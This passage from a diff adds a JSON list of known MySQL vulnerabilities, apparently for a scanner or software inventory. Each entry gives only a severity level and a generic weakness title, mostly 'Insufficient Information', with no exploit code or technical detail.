    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Use of a Broken or Risky Cryptographic Algorithm Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL 
Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient 
Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + 
{ + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Access Control Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL 
Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Critical", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + 
"Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Improper Neutralization of Special Elements used in a Command ('Command Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information 
Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": 
"Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + 
"Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL 
Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Privilege Management Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": 